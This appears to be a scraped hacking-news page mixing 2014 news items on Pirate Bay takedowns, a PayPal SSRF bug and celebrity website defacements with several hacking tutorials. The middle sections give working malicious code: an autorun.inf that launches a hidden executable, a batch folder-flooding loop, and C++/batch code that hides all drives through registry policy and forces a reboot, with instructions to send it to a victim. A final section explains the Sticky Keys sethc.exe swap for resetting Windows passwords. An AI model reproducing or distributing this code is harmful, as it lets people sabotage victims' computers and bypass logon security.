Google asked to censor 2 million PirateBay URLs

In the first week of April, Google says that it reported over 40 thousand URL takedown requests hosted on the torrent site.
Google asked to censor 2 million PirateBay URLs

In a bid to make it more difficult for public to find pirated content, copyright holders have turned to Google to delete/block around two million links to various copyrighted content hosted on thepiratebay.se. The torrent site itself does not take any takedown requests.

The number of thepiratebay.se URLs that have been submitted to Google reached the two million mark this week. The links that were submitted have either been removed or can no longer be accessed through search results.

The Google Transparency Report shows that the total number of URLs requested for removal on The Pirate Bay reached 2,003,331 (at the time of writing this article.)

Despite featuring in the list, The Pirate Bay is not the biggest offender even though it is the most popular. Filestube.com takes the top spot while Pirate Bay is 29th. Filestube accounts for almost 11 million URLs that have been requested for takedown. dilandau.eu, rapidgator.net, zippyshare.com, 4shared.com and many others are the most reported sites.

According to Google, the two million URLs represent between one and five percent of all the links that are indexed. This means that lots of other content from the torrent site is still available via Google. The Pirate Bay is unmoved by the development and despite the high number of takedown requests, the traffic of the site has been increasing steadily over the years.

Critical SSRF vulnerability in Paypal’s subsidiary allows to access Internal Network

Shubham Shah, a web application pentester from Australia, has discovered a critical Server Side Request Forgery(SSRF) vulnerability in the Bill Me Later website, a subsidiary of Paypal. The vulnerability exists in the subdomain(merchants.billmelater.com).

“The vulnerability itself was found within a test bed for BillMeLater’s SOAP API, which allowed for queries to be made to any given host URL.” researcher explained in his blog post.

An attacker is able to send request to any internal network through the API and get the response.  Some internal admin pages allowed him to query internal databases without asking any login credentials.

Researcher says that a successful exploitation may result in compromising the customers data.

The bug was reported to Paypal on October 2013 and he got reward from them on Jan. 2014.

Paypal has partially fixed the bug by restricting the SOAP API to access the internal servers.  However, researcher says that it still act as proxy to view other hosts.

If you would like to know more details about SSRF vulnerability and how it can be exploited for port scanning or internal network finding, you can refer the Riyaz Waliker blog post and thisdocument.

– See more at: http://www.ehackingnews.com/2014/03/critical-ssrf-vulnerability-in-paypals.html#sthash.RVglO2H3.dpuf

Miley Cyrus, Taylor Swift and Britney Spears websites hacked by Ethical Spectrum

Update : 
The latest tweet from the hacker shows he compromised the database containing username and password details belong to these websites “The database of #MileyCyrus, #SelenaGomez……etc with 2,5 million users and pass is for sell, anyone interested email me at my mail”

Exclusive Information:
The hacker told E Hacking News that he found multiple vulnerabilities in the Groundctrl website and gained access to the database server.

He also gained access to the CMS panel which manages the celebrities’ websites.

GroundCtrl CMS Panel

Original Article:

 

A hacker going by online handle “Ethical Spectrum” has hacked into websites belong to several celebrities and defaced the sites.

The affected websites include Miley Cyrus official site(mileycyrus.com), Selena Gomez(selenagomez.com), Taylor Swift site(taylorswift.com), Britney Spears site(britneyspears.com).

We are able to confirm that these are official websites of the celebrities, as it is being linked from their twitter account.

According to hackers twitter account(@Eth_Spectrum), he hacked into the above mentioned websites on March 8th.  The website was restored after the breach.  However, hacker mentioned he once again managed to deface them.  ]

Other websites attacked by the hacker are Ground Ctrl(groundctrl.com), mypinkfriday.com, Chelsea Handler site (chelseahandler.com), Aaron Lewis(aaronlewismusic.com/), therealcocojones.com, christinagrimmieofficial.com, Kacey Musgraves(kaceymusgraves.com).

The defacement just reads “Why i hacked this site, you can ask this person greg.patterson@groundctrl.com”.

Greg Patterson is the co-founder of the Groundctrl, an organization that build websites for artists.  It appears the security breach started from Groundctrl.

Other affected sites:

  • Pat Green(patgreen.com),
  • Rob Thomas(robthomasmusic.com),
  • Rock Mafia(rockmafia.com  ),
  • ritawilson.com  ,
  • sum41.com
  • nickcarter.net
  • jordanknight.com

If you are not able to see the defacement, you can find the mirror here:
http://www.zone-h.org/archive/notifier=Ethical%20Spectrum

All of the affected websites are currently showing the maintenance error message except groundctrl official website.

Hacker didn’t provide much information about the breach, so we are not sure how exactly he hacked into all of these websites, whether he found a zero-day exploit on the cms developed by groundctrl or all of the affected sites managed in a central place.

– See more at: http://www.ehackingnews.com/2014/03/miley-cyrus-taylor-swift-and-britney.html#sthash.xX849CPL.dpuf

How to execute a Virus

TO EXECUTE THE VIRUS AUTORUN.INF FILE IS USED

This article will give you complete details about the autorun.inf file.
This is the instructions that saved in the infected(call virus programs) autorun.inf file:

[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

is autorun.inf virus file?  no.  Then why antivirus block the autorun.inf files?  Go ahead to know the full details about auto run file.

Introduction to Autorun.inf File:
Auto run is file that triggers other programs,documents ,other files to be opened when the cd or pen drives are inserted.  Simpy triggers.

When cd or pen drives are inserted, windows will search for the autorun.inf file and follow the instructions of autorun.inf file(instructions have written inside the autorun.inf file).

How to create Autorun file?
Open notepad
type this command:

[Autorun]

save the file as “autorun.inf” (select all files, not text )

Complete Syntax and instructions inside the Autorun file:
Basic syntax must be inside  the autorun.inf file is :

[Autorun]

This will be used to identify the the file as autorun.

OPEN=
This will specify which application should be opened when the cd or pen drive is opened

Example:

open=virus.exe

This will launch the virus.exe file when cd or pen drive is opened.  The file should be in root directory.
if the file is in any other sub directories ,then we have to specify it.

Open=RECYCLER\Virus.exe

Explore=
Nothing big difference. if you right click and select explore option in cd or pen drive.  This command will be run.

AutoPlay=
Same as the above , but it will launch the the program when auto played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive’s shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Change the icon of your pen drive or cd.  you can use .ico,.bmp images(also .exe,.dll)

Example:

icon=breakthesecurity.ico

Label=

Specifies a text label to displayed for this CD in Explorer
Note that using the LABEL option can lead to problems displaying the selected ICON under WindowsXP.

Example:

Label=Ethical hacking



Why Antivirus Block Autorun.inf file?
From above ,you come to know that autorun.inf file is not virus.  But why antivirus blocks it?  Because as i told autorun file call or launch any application or exe files.  It will lead to virus attack.  If the autorun.inf is blocked,then there is no way to launch the virus code.

Autorun is not virus but it can call virus files.

Create a virus to create a infinite folder in a drive

this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.

@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Save the file with .bat extension(for eg: folderscreate.bat)

That’s all if you double click the file it will create a finite folder wherever the batch file is.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( “C:\\WINDOWS\\system32\\HackingStar.bat” ); /*opening or creating new file with .bat extension*/

write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n”; write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n”; write<<“shutdown -r -c \”Sorry Your System is hacked by us!\” -f”<<“\n”; write.close(); //close file ShellExecute(NULL,”open”,”C:\\WINDOWS\\system32\\HackingStar.bat “,NULL,NULL,SW_SHOWNORMAL); return 0; }

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don’t run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.

Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \”Sorry Your System is hacked by us!\” -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

New XSS Cheat Sheet – Bypassing Modern Web Application Firewall XSS Filters

While we doing web application penetration testing for our clients, we may some time have to face the Web application Firewall that blocks every malicious request/payload.

There are some Cheat sheets available on internet that helped to bypass WAF in the past. However, those cheats won’t work with the modern WAFs and latest browsers.

So, here is need for creating new Cheat sheet.

One of the top security researcher Rafay Baloch has done an excellent job by organizing his own techniques to bypass modern WAFs and published a white paper on that.

The paper titled “Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters” covers only the techniques needed for bypassing XSS filters.

Rafay promised to write other vulnerabilities’ bypassing techniques in his next paper.

You can download the WhitePaper from here.

Two Information Technology(IT) students Hack InfoSys to echarge mobile phones worth Rs.8 Lakh

Two Information Technology(IT) students have been arrested by Jaipur cyber crime police for hacking Data InfoSys e-processing system and fraudulently recharging BSNL mobile phones.

Kulshrestha Varma and Hardik Sud, both 19-years-old, students of APG University in Shimla, managed to recharge more than 500 mobile phones, causing loss of Rs.8 Lakh for the Data infosys.

According to Times of India, the students have used a public Internet cafe to breach the Data InfoSys’ website.  These two kids might have thought that police can’t catch them, if they use a cyber cafe.

The company became aware of fraudulent recharges at the end of last year and filed a complaint in cyber police station back in December 3rd.  Police took 75 days to crack the case.

Police has arrested and brought them to Jaipur on a transit remand.  The police suspect involvement of several other people in this cyber crime.

Thousands of websites infected via Vulnerability in WordPress Optimize Press Theme

A file upload vulnerability in the OptimizePress theme allowed attackers to infect thousands of WordPress websites, reports Sucuri.The vulnerability in question is at “lib/admin/media-upload.php” location that allows anyone to upload any kind of files to the “wp-content/uploads/optpress/images_comingsoon” folder.
Sponsored Links
Sucuri Team has detected that more than 2,000 websites using the Optimizepress theme have been compromised.  All of the compromised sites have been injected with iFrame to same malicious domain.Almost 75% infected websites have already been blacklisted in Google Safe browsing.If you are using the above theme, you are urged to immediately upgrade to the latest version.  Otherwise, you will soon find yourself victim to malware infection.

Restore Windows 7 password through Sticky Keys

Untitled (4)

You can do this by using Windows RE. You can start Windows RE by booting the Windows Vista or Windows 7 setup DVD and then selecting “Repair” instead of “Install Windows.”

By the way, you can’t use the Windows XP boot CD for this purpose because its Recovery Console will ask for a password for the offline installation. However, you can use a Vista or Windows 7 DVD to reset a Windows administrator password on Windows XP.

This works because Windows RE, which is based on Vista or Windows 7, will let you launch a command prompt with access to an offline installation without requiring a password.

To reset administrator password, follow these steps:

  1. Boot from Windows RE and access the command prompt.
  2. Find the drive letter of the partition where Windows is installed. In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in most cases because the first partition contains Startup Repair. To find the drive letter, type C: (or D:, respectively) and search for the Windows folder. Note that Windows PE (RE) usually resides on X:.
  3. Type the following command (replace “c:”with the correct drive letter if Windows is not located on C:):
  4. copy c:\windows\system32\sethc.exe c:\
  5. This creates a copy of sethc.exe to restore later.
  6. Type this command to replace sethc.exe with cmd.exe:
  7. copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
  8. Reboot your computer and start the Windows installation where you forgot the administrator password.
  9. After you see the logon screen, press the SHIFT key five times.
  10. You should see a command prompt where you can enter the following command to reset the Windows password (see screenshot above):
  11. net user your_user_name new_password
  12. If you don’t know your user name, just type net user to list the available user names.
  13. You can now log on with the new password.

I recommend that you replace sethc.exe with the copy you stored in the root folder of your system drive in step 3. For this, you have to boot up again with Windows PE or RE because you can’t replace system files while the Windows installation is online. Then you have to enter this command: copy /y c:\sethc.exe c:\windows\system32\sethc.exe